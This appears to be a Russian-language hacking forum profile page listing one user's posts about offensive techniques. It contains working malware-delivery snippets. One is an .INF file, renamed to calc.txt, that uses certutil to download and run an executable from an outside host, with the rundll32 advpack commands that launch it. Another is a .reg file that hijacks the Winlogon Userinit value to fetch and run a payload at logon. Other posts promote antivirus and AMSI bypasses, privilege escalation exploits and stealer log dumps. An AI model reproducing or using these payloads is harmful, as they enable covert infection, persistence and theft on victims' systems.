Перейти к содержимому


Xrahitel

Регистрация: 04 Янв 2015
Оффлайн Активность: Скрыто
*****

#43009 Как спрятать боевую нагрузку в .txt

Написано Xrahitel Сегодня, 01:02

Всем п/т так как файлы .INF это просто текстовый документ по этому мы тупо его переименуем в calc.txt biggrin.png 

 

Для демонстрации взял макрос.

 

 

p.s Ответы найдете тут под видео тыц также в бою тыц

 

нагрузка в .INF

[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"test"
[DefaultInstall]
RunPreSetupCommands=Command1
[Command1]
C:\Windows\System32\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/ylMDeb/xrahitel.exe %APPDATA%\xrahitel.exe & start %APPDATA%\xrahitel.exe

Команды что сам про тестил;

rundll32.exe advpack.dll,LaunchINFSection calc.txt,DefaultInstall

rundll32.exe ieadvpack.dll,LaunchINFSection calc.txt,,1,

rundll32.exe advpack.dll,LaunchINFSection calc.txt,,1,

  • 1


#43007 Как определить тип файервола

Написано Xrahitel Вчера, 14:21

wafw00f.png

 

  • 1


#43006 Маленькая фиша (wwh)

Написано Xrahitel Вчера, 13:55

1.gif


  • 1


#43004 Remote Hacker Probe Pro V.2

Написано Xrahitel Вчера, 02:56

 

remote probe или тыц


  • 2


#43003 Registry to PowerShell converter

Написано Xrahitel 21 Июль 2021 - 21:03

 

p.converter тему тут найдете тыц wink.png 

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/Vupfdp/test.exe %APPDATA%\test.exe & start %APPDATA%\test.exe"

  • 2


#43002 свалка логов азора ,Vidar,anubis

Написано Xrahitel 21 Июль 2021 - 17:10

не смотрел тыц 

  • 1


#43001 Повышение привилегий Linux

Написано Xrahitel 21 Июль 2021 - 11:05

 

Local Privilege (CVE-2021-33909)


  • 1


#42999 Charlotte DLL bypass av

Написано Xrahitel 21 Июль 2021 - 10:05

 

Charlotte DLL FUD


  • 1


#42998 доставка файлов через DNS

Написано Xrahitel 21 Июль 2021 - 10:01

 

DNSStager


  • 1


#42995 Bypass non-admin registry (poc)

Написано Xrahitel 21 Июль 2021 - 09:25

 

Новости ,более подробно тыц biggrin.png 

 

 

 

Windows – CVE-2021-36934


  • 2


#42994 Вредоносные .REG файлы

Написано Xrahitel 20 Июль 2021 - 14:36

 

 

Кривой какой то тыц этот не плоха вроде Registry to PowerShell converter smile.png 

 

Вариант с JScript.


  • 1


#42993 tools Movement - Code Execution

Написано Xrahitel 20 Июль 2021 - 12:48

2021-07-20-195033.gif


  • 1


#42992 Cobalt Strike - Inject AMSI Bypass

Написано Xrahitel 20 Июль 2021 - 12:16

 

injectAmsiBypass


  • 2


#42991 про калькулятор или calc.exe

Написано Xrahitel 20 Июль 2021 - 10:00

Тема тыц или тыц.

 

2021-07-20-170124.gif

 

p.s dll для теста тыц

                                                       control.exe C:\Users\administrator\Desktop\evil.dll

  • 1


#42990 Платные статьи Xakep.ru и.т.д

Написано Xrahitel 19 Июль 2021 - 22:00

Искусство тестирования в сеть и Android глазами хакера


  • 1